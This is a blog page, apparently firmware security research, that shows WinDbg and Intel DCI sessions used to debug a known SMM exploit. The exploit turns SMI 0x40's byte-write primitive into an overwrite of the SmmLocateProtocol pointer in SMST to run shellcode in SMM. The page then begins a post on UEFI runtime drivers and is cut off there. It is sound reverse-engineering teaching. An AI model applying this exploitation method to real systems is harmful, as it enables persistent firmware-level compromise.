src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNqhKXEV4kXpS5wf7G0FthmXdA4Hzl3Cr3h_lAM1LIU2mpbglmRB6SpPump2CIRcQE-TtNVgBTG1wy1cLo2O2mSEKaHTyRH5_6J5ZN5cUy9tn71b-qJZnalzk2xwvXhMsD1v-_GGN0iUs/s320/Untitled.png" width="320" /></a></div><h2 style="text-align: left;">Debugging the system</h2><p style="text-align: left;">Debugging the Windows kernel via DCI is functional but pointless unless using the kernel debugging is impossible. Instead, let us debug the SMM vulnerability exploit as an example use of the extension.</p><h3 style="text-align: left;">The SMM vulnerability and exploit</h3>The vulnerability is that SMI 0x40 allows arbitrary SMRAM to be overwritten with 0x07. The exploit uses this primitive to overwrite a function pointer in <a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmCore.c#L19">the global variable referred to as SMST</a> to achieve arbitrary code execution in SMM. <p></p><p style="text-align: left;">The beautiful thing about SMST is that its address is leaked outside SMRAM by design. Ring0 code can search <a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmIpl.c">SMM core private data</a>, which has the distinctive 'smmc' signature, from the UEFI runtime code region, then find the leaked pointer in it.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZAu1bDbWiCM6zX44Gv4_b3DtCzu0m443RIutnZRtpC8e9gxDiCaYalW7sNrx-Hd4qLgnh8ASAJpR6V6gPN_C5bX1I_ADp0a949TxN74-Ep_XPvTODDBxaUdF9iKSrgK3DCt-UYJMJkQ/s384/form.png" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="343" data-original-width="384" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZAu1bDbWiCM6zX44Gv4_b3DtCzu0m443RIutnZRtpC8e9gxDiCaYalW7sNrx-Hd4qLgnh8ASAJpR6V6gPN_C5bX1I_ADp0a949TxN74-Ep_XPvTODDBxaUdF9iKSrgK3DCt-UYJMJkQ/w400-h358/form.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Address of SMST is leaked outside SMRAM</td></tr></tbody></table></blockquote><p></p><p style="text-align: left;">The exploit takes advantage of this and locates the address of the function pointer in SMRAM without depending on BIOS and system versions. For more details of the vulnerability and exploit, see <a href="https://github.com/tandasat/SmmExploit">the GitHub repository</a>. </p><h2 style="text-align: left;">Debugging SMM and Shellcode with Windbg</h2><div><p style="text-align: left;">When the exploit is executed on a patched system, it debug-prints the range of SMRAM, addresses of SMM core and SMST, but fails to run the shell code.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyduud0ZZJob-sGRwJnnnP-f9n-gwGlUbZIyqg4wqW2s0VfKS94hkU7rSy-16uCA8Lqt94vX8NsEfUX44LefBxDuaOc5UxGX7qItn84hgPHxYY8X0Mg5Qn0oT3blb81IKSpoZfO8Sqz4/s1437/failed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1437" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyduud0ZZJob-sGRwJnnnP-f9n-gwGlUbZIyqg4wqW2s0VfKS94hkU7rSy-16uCA8Lqt94vX8NsEfUX44LefBxDuaOc5UxGX7qItn84hgPHxYY8X0Mg5Qn0oT3blb81IKSpoZfO8Sqz4/w640-h214/failed.png" width="640" /></a></div>Let us debug the exploit and simulate successful exploitation with help of Windbg. We will:</div><div><ol style="text-align: left;"><li>load symbols for the "dt" command, then</li><li>break on SMM entry,</li><li>extract and analyze SMRAM,</li><li>set a breakpoint on the SMI 0x40 handler,</li><li>debug and modify execution to simulate successful exploitation</li></ol><div><p style="text-align: left;">First, break into the Windbg and set a breakpoint to one of NT APIs the exploit calls.</p><div style="text-align: left;"><span style="font-family: courier;">----<br /></span><span style="font-family: Consolas; font-size: x-small;">0: kd> bp nt!ExGetSystemFirmwareTable<br /></span><span><span style="font-family: Consolas; font-size: x-small;">0: kd> g</span><br /></span><span style="font-family: courier;">----</span></div><p style="text-align: left;"><span style="font-family: inherit;">Then, rerun the exploit on the target system. Reload the symbol of the exploit once the target breaks into Windbg. </span></p><span style="font-family: courier;">----</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> .reload demo.sys</span><span><br />...<br />ModLoad: fffff806`4d860000 fffff806`4d869000 \??\C:\Users\tanda\Desktop\demo.sys<br />Loading symbols for fffff806`4d860000 demo.sys -> demo.sys</span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br />0: kd> dt demo!SMM_CORE_PRIVATE_DATA<br /> +0x000 Signature : Uint8B</span></div><div><span style="font-family: Consolas; font-size: x-small;"> ...</span></div><div><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">On another windbg_dci session, enable the SMM entry break and resume the system. The system will break into the debugger again.</p><div style="text-align: left;"><span style="font-family: courier;">----</span></div><div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] Hardware Breakpoint Execution breakpoint #0001 at [0x10:fffff8064f795b00]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>> <span style="background-color: #f4cccc;">itp.cv.smmentrybreak = 1</span></span></div><div><span style="font-family: Consolas; font-size: x-small;">>>> go()</span></div><div><span style="font-family: Consolas; font-size: x-small;">CPUs Resuming execution</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] SMM entry Break at [0xcb00:0000000000008000]</span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] SMM entry Break at [0xcb80:0000000000008000]</span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] SMM entry Break at [0xcc00:0000000000008000]</span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] SMM entry Break at [0xcc80:0000000000008000]</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div></div><div><span style="font-family: courier;">----</span></div><p style="text-align: left;">On the Windbg session, confirm that this is SMI 0x40 by checking RIP being 0x8000 and AL being 0x40. Then, dump the contents of SMRAM according to the range debug-printed by the previous run. </p><div><span style="font-family: courier;">----</span></div><div><div><span style="font-family: Consolas; font-size: x-small;">Break instruction exception - code 80000003 (first chance)</span></div><div><span style="font-family: Consolas; font-size: x-small;">cb00:00000000`00008000 bb9180662e mov ebx,2E668091h</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> r</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span style="background-color: #f4cccc;">rax=0000000000000040</span> rbx=0000000000000000 rcx=ffff808cca4df080</span></div><div><span style="font-family: Consolas; font-size: x-small;">rdx=00000000000000b2 rsi=ffff808cd5aff000 rdi=ffff808cd746b7d0</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span style="background-color: #f4cccc;">rip=0000000000008000</span> rsp=000000002c127668 rbp=0000000000000000</span></div><div><span style="font-family: Consolas; font-size: x-small;"> r8=0000000000098367 r9=0000000000000004 r10=00000000ffffffff</span></div><div><span style="font-family: Consolas; font-size: x-small;">r11=ffff808cd74f6040 r12=ffffffff80001998 r13=0000000000000002</span></div><div><span style="font-family: Consolas; font-size: x-small;">r14=fffff8064d7f52f8 r15=ffff808cd5aff000</span></div><div><span style="font-family: Consolas; font-size: x-small;">...</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> <span style="background-color: #f4cccc;">.writemem C:\temp\smram_88400000_88800000.bin 0`88400000 0`88800000-1</span></span></div></div><div><span style="font-family: Consolas; font-size: x-small;">Writing 400000 bytes.........(snip)...</span></div></div><div><span style="font-family: courier;">----</span></div><p style="text-align: left;">Download and run the SMRAM forensic script <a href="https://github.com/Cr4sh/smram_parse">authored by Dmytro Oleksiuk</a> (aka Cr4sh, <a href="https://twitter.com/d_olex">@d_olex</a>). This will show the address of the SMI 0x40 handler.</p><span><span style="font-family: courier;">----</span><br /><span style="font-family: Consolas; font-size: x-small;">$ wget https://raw.githubusercontent.com/tandasat/smram_parse/master/smram_parse.py<br />$ python3 smram_parse.py smram_88400000_88800000.bin<br />...<br />SW SMI HANDLERS:<br />...<br />0x88700110: <span style="background-color: #f4cccc;">SMI = 0x40, addr = 0x886e5c68</span>, image = 0x886e5000<br />...</span><br /></span><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">On the Windbg session, confirm the address looks correct. You can also find that the function refers to outside the SMRAM as highlighted in red. Let us run the target until there.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> uf 0`886e5c68<br />00000000`886e5c68 4053 push rbx<br />00000000`886e5c6a 4883ec20 sub rsp,20h<br />00000000`886e5c6e 0fb704250e040000 <span style="background-color: #f4cccc;">movzx eax,word ptr [40Eh]</span><br />00000000`886e5c76 ba67000000 mov edx,67h<br />00000000`886e5c7b c605be12000001 mov byte ptr [00000000`886e6f40],1<br />00000000`886e5c82 c1e004 shl eax,4<br />00000000`886e5c85 0504010000 <span style="background-color: #f4cccc;">add eax,104h</span><br />00000000`886e5c8a 8b18 <span style="background-color: #f4cccc;">mov ebx,dword ptr [rax]</span><br /><br />0: kd> g 0`886e5c8a</span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">In the below disassembly, you can see that 0x104, outside the SMRAM, is referenced and contains the address to be overwritten minus 2 as colored in red. You can also find that subsequent code overwrites contents of the address as indicated by green. The address to be overwritten is highlighted in yellow.</p></div><div><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0038:00000000`886e5c8a 8b18 mov <span style="background-color: #d9ead3;">ebx</span>,dword ptr [rax] ds:0018:<span style="background-color: #f4cccc;">00000000`00000104=887f97fe</span><br />0038:00000000`886e5c8c 488bcb mov rcx,rbx<br />0038:00000000`886e5c8f e8bc0d0000 call 00000000`886e6a50<br />...<br />0038:00000000`886e5c9e c6430207 <span style="background-color: #d9ead3;">mov byte ptr [rbx+2],7</span> ds:0018:00000000`<span style="background-color: #fff2cc;">887f9800</span><span style="background-color: white;">=8c</span><br />0038:00000000`886e5ca2 eb10 jmp 00000000`886e5cb4</span><br /></span><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">How does the exploit compute this address? Remember that the exploit was able to find the SMM core private data at 0x87f21390. Let us "dt" the address to confirm that the SMM private core data is indeed present in the address, as well as the leaked address of SMST highlighted in yellow.</p><p style="text-align: left;"><span><span style="font-family: courier;">----</span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> db 0`<span style="background-color: #f4cccc;">87f21390</span> l10<br />00000000`87f21390 73 6d 6d 63 00 00 00 00-18 67 4f 84 00 00 00 00 <span style="background-color: #d9ead3;">smmc</span>.....gO.....<br /><br />0: kd> dt demo!SMM_CORE_PRIVATE_DATA 0`<span style="background-color: #f4cccc;">87f21390</span><br /></span></span><span style="font-family: Consolas; font-size: x-small;"><span> </span><span>+0x000 Signature : <span style="background-color: #d9ead3;">0x636d6d73</span><br /></span><span> </span><span>+0x008 SmmIplImageHandle : 0x00000000`844f6718 Void<br /></span><span> </span><span>+0x010 SmramRangeCount : 3<br /></span><span> </span><span>+0x018 SmramRanges : 0x00000000`844f2d18 Void<br /></span><span> </span><span>+0x020 SmmEntryPoint : 0x00000000`887f9d7c Void<br /></span><span> </span><span>+0x028 SmmEntryPointRegistered : 0x1 ''<br /></span><span> </span><span>+0x029 InSmm : 0x1 ''<br /></span><span> </span><span>+0x030 <span style="background-color: #fff2cc;">Smst : 0x00000000`887f9730</span> EFI_SMM_SYSTEM_TABLE2<br /></span><span> </span><span>+0x038 CommunicationBuffer : (null) <br /></span><span> </span><span>+0x040 BufferSize : 0x20<br /></span><span> </span><span>+0x048 ReturnStatus : 0<br /></span><span> </span><span>+0x050 PiSmmCoreImageBase : _LARGE_INTEGER 0x1<br /></span><span> </span><span>+0x058 PiSmmCoreImageSize : 0xfffff806`53427320<br /></span></span><span style="font-family: Consolas; font-size: x-small;"> </span><span><span style="font-family: Consolas; font-size: x-small;">+0x060 PiSmmCoreEntryPoint : _LARGE_INTEGER 0xfffff806`53427980<br /></span></span><span style="font-family: courier;">----</span></p><p style="text-align: left;">The exploit adds 0xd0 to the address of SMST since its layout is known. As shown below, the offset 0xd0 is the function pointer SmmLocateProtocol.</p><div><span style="font-family: courier;">----<br /></span><span style="font-family: Consolas; font-size: x-small;">0: kd> db 0`<span style="background-color: #fff2cc;">887f9730</span> l10</span></div><div style="text-align: left;"><span style="font-family: Consolas; font-size: x-small;">00000000`887f9730 53 4d 53 54 00 00 00 00-1e 00 01 00 18 00 00 00 SMST............</span></div><p></p><p style="text-align: left;"><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`<span style="background-color: #fff2cc;">887f9730</span><br /> +0x000 Hdr : EFI_TABLE_HEADER<br /></span><span> </span><span>+0x018 SmmFirmwareVendor : (null) <br /></span><span> </span><span>+0x020 SmmFirmwareRevision : 0<br /></span><span> </span><span>+0x028 SmmInstallConfigurationTable : 0x00000000`887fa1b0 Void<br /></span><span> </span><span>+0x030 SmmIo : EFI_SMM_CPU_IO2_PROTOCOL<br /></span><span> </span><span>+0x050 SmmAllocatePool : 0x00000000`887fb61c Void<br /></span><span> </span><span>+0x058 SmmFreePool : 0x00000000`887fb744 Void<br /></span><span> </span><span>+0x060 SmmAllocatePages : 0x00000000`887fbd20 Void<br /></span><span> </span><span>+0x068 SmmFreePages : 0x00000000`887fbe30 Void<br /></span><span> </span><span>+0x070 SmmStartupThisAp : 0x00000000`887e0af0 Void<br /></span><span> </span><span>+0x078 CurrentlyExecutingCpu : 0<br /></span><span> </span><span>+0x080 NumberOfCpus : 4<br /></span><span> </span><span>+0x088 CpuSaveStateSize : 0x00000000`887ddd50 -> 0x400<br /></span><span> </span><span>+0x090 CpuSaveState : 0x00000000`887ddf50 -> 0x00000000`887dac00 Void<br /></span><span> </span><span>+0x098 NumberOfTableEntries : 6<br /></span><span> </span><span>+0x0a0 SmmConfigurationTable : 0x00000000`887e5810 Void<br /></span><span> </span><span>+0x0a8 SmmInstallProtocolInterface : 0x00000000`887fb928 Void<br /></span><span> </span><span>+0x0b0 SmmUninstallProtocolInterface : 0x00000000`887fbaf4 Void<br /></span><span> </span><span>+0x0b8 SmmHandleProtocol : 0x00000000`887fbc1c Void<br /></span><span> </span><span>+0x0c0 SmmRegisterProtocolNotify : 0x00000000`887fbf2c Void<br /></span><span> </span><span>+0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void<br /></span><span> </span><span><span style="background-color: #f4cccc;">+0x0d0 SmmLocateProtocol : 0x00000000`887f9f8c</span> Void<br /></span><span> </span><span>+0x0d8 SmiManage : 0x00000000`887fb2fc Void<br /></span><span> </span><span>+0x0e0 SmiHandlerRegister : 0x00000000`887fb3d4 Void<br /></span><span> </span><span>+0x0e8 SmiHandlerUnRegister : 0x00000000`887fb48c Void</span></span><span style="font-family: courier;"><br />----<br /></span></p><p style="text-align: left;">So, the SMI 0x40 would have been about to overwrite the contents of the SmmLocateProtorol field.</p><p style="text-align: left;">Since the code we are debugging is no longer vulnerable, let us emulate successful exploitation by changing the RIP to the MOV instruction. After stepping through the instruction, we can confirm the contents of the address highlighted in yellow was changed to 0x07.</p><span style="font-family: courier;">----</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> dp 0`887f9800 l1</span><br /><span>00000000`<span style="background-color: #fff2cc;">887f9800</span> 00000000`887f9f<span style="background-color: #f4cccc;">8c</span></span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /><span>0: kd> r rip=0`886e5c9e </span><br /><span>0: kd> t</span></span><span><span style="font-family: Consolas; font-size: x-small;"><br /><br />0: kd> dp 0`887f9800 l1<br />00000000`<span style="background-color: #fff2cc;">887f9800</span><span style="background-color: white;"> </span> 00000000`887f9f<span style="background-color: #f4cccc;">07</span></span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">After repeating this step 4 times, the address is overwritten to 0x07070707, outside the SMRAM.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> dp 0`887f9800 l1<br />00000000`<span style="background-color: #fff2cc;">887f9800</span> 00000000`<span style="background-color: #f4cccc;">07070707</span></span></span><span style="font-family: Consolas; font-size: x-small;"><span><br /><br />0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730<br />...</span><span><br /></span><span> </span><span>+0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void</span><span><br /></span><span> </span><span>+0x0d0 <span style="background-color: #f4cccc;">SmmLocateProtocol : 0x00000000`07070707</span> Void</span></span></div><span style="font-family: Consolas; font-size: x-small;"><span> </span><span>+0x0d8 SmiManage : 0x00000000`887fb2fc Void</span></span><div><span><span style="font-family: Consolas; font-size: x-small;">...</span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">Let us run the target one more time to verify successful exploitation. The next SMI is 0xdf, which will call SmmLocateProtocol.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> g<br />Break instruction exception - code 80000003 (first chance)<br />cb00:00000000`00008000 bb9180662e mov ebx,2E668091h</span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><span><br />0: kd> r<br /><span style="background-color: #f4cccc;">rax=00000000000000df</span> rbx=0000000000000000 rcx=fffff8064d544180<br />rdx=ffffed842b8400b2 rsi=ffff808cd68ff000 rdi=ffff808cd521e7c0<br /><span style="background-color: #f4cccc;">rip=0000000000008000</span> rsp=000000002b8476e0 rbp=0000000000000000<br /> r8=0000000000000001 r9=ffff808cd7345040 r10=6c6c656873204d4d<br />r11=ffff808ccc4901e8 r12=ffffffff80002b6c r13=0000000000000002<br />r14=fffff8064d8652f8 r15=ffff808cd68ff000<br />...</span><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;"><div>0: kd> uf <span style="background-color: #fff2cc;">07070707</span></div><div>00000000`07070707 90 nop</div><div>00000000`07070708 90 nop</div><div>00000000`07070709 90 nop</div><div>00000000`0707070a 90 nop</div><div>00000000`0707070b 90 nop</div><div>00000000`0707070c 90 nop</div><div>00000000`0707070d 90 nop</div><div>00000000`0707070e 90 nop</div><div>00000000`0707070f 90 nop</div><div>00000000`07070710 4c89442418 mov qword ptr [rsp+18h],r8</div><div>00000000`07070715 4889542410 mov qword ptr [rsp+10h],rdx</div><div>00000000`0707071a 48894c2408 mov qword ptr [rsp+8],rcx</div><div>00000000`0707071f 4883ec28 sub rsp,28h</div><div>00000000`07070723 48c744240800000000 mov qword ptr [rsp+8],0</div><div>00000000`0707072c b99e000000 mov ecx,9Eh</div><div>00000000`07070731 0f32 rdmsr</div></span><div><span style="font-family: Consolas; font-size: x-small;"><br /><span>0: kd> bp 0`07070707 </span><br /><span>0: kd> g</span><br /><span>Breakpoint 0 hit</span><br /><span style="background-color: #fff2cc;">0038:00000000`07070707 90 nop</span></span></div><div><span style="background-color: white; font-family: courier;">----</span></div><p style="text-align: left;">🎉 As expected, the target breaks into the debugger at 0x07070707. Once the shell code is executed, its output stored at 0x0 can be checked.</p><p style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpoWk-JmCN9-kqjZvf2OLsVXZu7WDRHyHniaQxOh1DfmASyW5vl-N_8lYUnzG0PBsQf-C88NKZqtWrduRTqOc-gHHejWE5ameI1PEVrmxV87S3ORIQXeQBKseTon2ZRLCe7PqPLJIEZ8s/s1437/ok.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="482" data-original-width="1437" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpoWk-JmCN9-kqjZvf2OLsVXZu7WDRHyHniaQxOh1DfmASyW5vl-N_8lYUnzG0PBsQf-C88NKZqtWrduRTqOc-gHHejWE5ameI1PEVrmxV87S3ORIQXeQBKseTon2ZRLCe7PqPLJIEZ8s/w640-h214/ok.png" width="640" /></a></p><div><span style="background-color: white;"><span style="font-family: courier;">----</span></span></div><div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> dx *(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0</span></div><div><span style="font-family: Consolas; font-size: x-small;">*(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0 [Type: HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x000] Untouched : 0x1588748418 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x008] Smbase : 0x887cb000 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x010] SmmFeatureControl : 0x1 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x018] SmmMcaCap : 0xc00000000000000 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x020] Eptp : 0x0 [Type: unsigned __int64]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [+0x028] HvPatchedAddress : 0x0 [Type: unsigned __int64]</span></div></div><div><span style="background-color: white;"><span style="font-family: courier;">----</span></span><br /></div><div><p style="text-align: left;">Hopefully, you find the combination of DCI and Windbg interesting.</p><h2 style="text-align: left;">Resources </h2><h3 style="text-align: left;">Tips for general debugging with DCI</h3></div><p style="text-align: left;"></p><ul style="text-align: left;"><li>Make the target system single core with bcdedit. I found debugging multi-core configuration is unusably unstable. </li><li>Fully disable Hyper-V on the target before debugging. Hyper-V will crash the system with synthetic watchdog bugcheck, even if VBS is disabled. </li><li>DCI offers break-on-VM-exit/entry but I could never make it work. Do not waste time but also let me know if it worked for you.</li></ul><h3 style="text-align: left;">Tips and references for reverse engineering SMM with DCI</h3><div><ul><li>SMI is handled by the following functions in EDK2. Your system can very well be the same.</li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/X64/SmiEntry.nasm#L89">_SmiEntryPoint (SmiEntry.nasm)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/MpService.c#L1562">SmiRendezvous (MpService.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/UefiCpuPkg/PiSmmCpuDxeSmm/MpService.c#L454">BSPHandler (MpService.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmCore.c#L645">SmmEntryPoint (PiSmmCore.c)</a></li><ul><li><a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/Smi.c#L97">SmiManage (Smi.c)</a></li></ul></ul></ul></ul></ul></ul></div><div><ul style="text-align: left;"><li>Neither Windbg nor Intel System Debugger correctly displays 16-bit mode code at the beginning of SMM. Just continue single stepping until around offset 0x90.<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUFefVA-T1INcThIONk-BDLCVZO-EFnFJmn1_1hHwzxFVQh2O9QsaufjuHhGaZvaEykBmIXkLe4K_xyI4bg2ZpLAMzTtiSU9BNAbOWxFGxAz0WDbvry3KP-uVuEZtlP-zdacwWMdU2cQk/s2048/brokwn_asm.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1041" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUFefVA-T1INcThIONk-BDLCVZO-EFnFJmn1_1hHwzxFVQh2O9QsaufjuHhGaZvaEykBmIXkLe4K_xyI4bg2ZpLAMzTtiSU9BNAbOWxFGxAz0WDbvry3KP-uVuEZtlP-zdacwWMdU2cQk/s320/brokwn_asm.png" width="320" /></a></div></li></ul><ul style="text-align: left;"><li><a href="https://github.com/h2hconference/2017/blob/master/H2HC%20-%20Ermolov%20&%20Zakirov%20-%20%20UEFI%20BIOS%20Holes.pptx">UEFI BIOS holes. So Much Magic. Don’t Come Inside</a> (Slides)</li><li><a href="https://www.slideshare.net/phdays/tapping-into-the-core">Tapping into the core</a> (Slides)</li><li><a href="https://github.com/eclypsium/Publications/blob/master/2018/DEFCON26/DC26_UEFI_EXPLOITATION_MASSES_FINAL.pdf">UEFI Exploitation For The Masses</a> (Slides)</li><li><a href="https://eclypsium.com/2018/07/23/evil-maid-firmware-attacks-using-usb-debug/">“EVIL MAID” FIRMWARE ATTACKS USING USB DEBUG</a></li></ul><h4 style="text-align: left;">Others</h4><ul style="text-align: left;"><li><a href="https://www.asset-intertech.com/resources/blog/2020/05/open-source-firmware-explorations-using-dci-on-the-aaeon-up-squared-board/">Open Source Firmware explorations using DCI on the AAEON UP Squared board</a> </li><ul><li>Enabling DCI on UP Squared. The most detailed step-by-step instructions for the device. Excellent blog. </li></ul><li><a href="http://advdbg.org/gdk/download/20200606-GDC_3_DbgWindows.pdf">使用DCI EXDI会话调 试Windows内核</a> (Chinese)</li><ul><li>Reverse engineering Windows using DCI and Windbg</li></ul><li><a href="http://blog.cr4.sh/2016/10/exploiting-ami-aptio-firmware.html">Exploiting AMI Aptio firmware on example of Intel NUC</a></li><ul><li>About the same vulnerability and SMRAM forencits </li></ul><li>C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\sdk\samples\exdi</li><ul><li>for EXDI. This includes Windbg-gdb-VMware bridge called ExdiGdbSrvSample.</li></ul></ul></div><h2 style="text-align: left;">Acknowledgement </h2><div><ul style="text-align: left;"><li>Researchers published their work around DCI/SMM, in particular, Dmytro Oleksiuk (<a href="https://twitter.com/d_olex">@d_olex</a>) and Mark Ermolov (<a href="https://twitter.com/_markel___">@_markel___</a>)</li></ul></div></div></div></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-61799350053618519712020-12-24T08:34:00.002-08:002020-12-24T08:52:52.718-08:00Experiment in extracting runtime drivers on Windows<p>This post explains the concept of UEFI runtime drivers, how they interact with OS, and an experimental attempt to extract them.</p><p>Here is a quick takeaway from this article. </p><p></p><ul style="text-align: left;"><li>UEFI runtime drivers are part of firmware that run with the ring-0 privilege before OS starts.</li><li>They provide interfaces to some firmware-dependent features, called runtime services, to OS. </li><li>Windows saves the addresses of those runtime services into HalEfiRuntimeServicesBlock</li><li>The base addresses of runtime drivers can be located from the contents of HalEfiRuntimeServicesBlock, but it is difficult to safely find HalEfiRuntimeServicesBlock and base addresses.</li><li>Dumping the runtime drivers are useful for diagnosing issues with them, but the HalEfiRuntimeServicesBlock-based approach is fundamentally limited to drivers that implement runtime services.</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmI6z9ddohFMWecaeq8ne-PEdwHrc8ThPAOkBMSKfypAajLaW2XijGVJ4oQjZSqqgv_1CJkFi74OBQhmluNoETv7f4MBKTQofsbIS04XdkU0C_wN7FTnHf2ryJtAxIOy7RtIwBRZJJrHc/s2048/IMG-4907.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="2048" data-original-width="1536" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmI6z9ddohFMWecaeq8ne-PEdwHrc8ThPAOkBMSKfypAajLaW2XijGVJ4oQjZSqqgv_1CJkFi74OBQhmluNoETv7f4MBKTQofsbIS04XdkU0C_wN7FTnHf2ryJtAxIOy7RtIwBRZJJrHc/s320/IMG-4907.JPG" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Happy holidays?</td></tr></tbody></table><h2 style="text-align: left;"><br />What are UEFI runtime drivers?</h2><div>Any retail x86_64 PCs have UEFI-based system firmware those days, and such firmware must implement some modules that reside in memory from system start up to shutdown. Those modules are called UEFI "runtime drivers" and meant to provide interfaces to certain firmware-implemented services to an operating system (OS), as specified by the UEFI specification</div><div><br /></div><div>For example, UEFI defines ResetSystem() as one of such interfaces and requires OEM to implement firmware containing the runtime driver that implements it. Taking 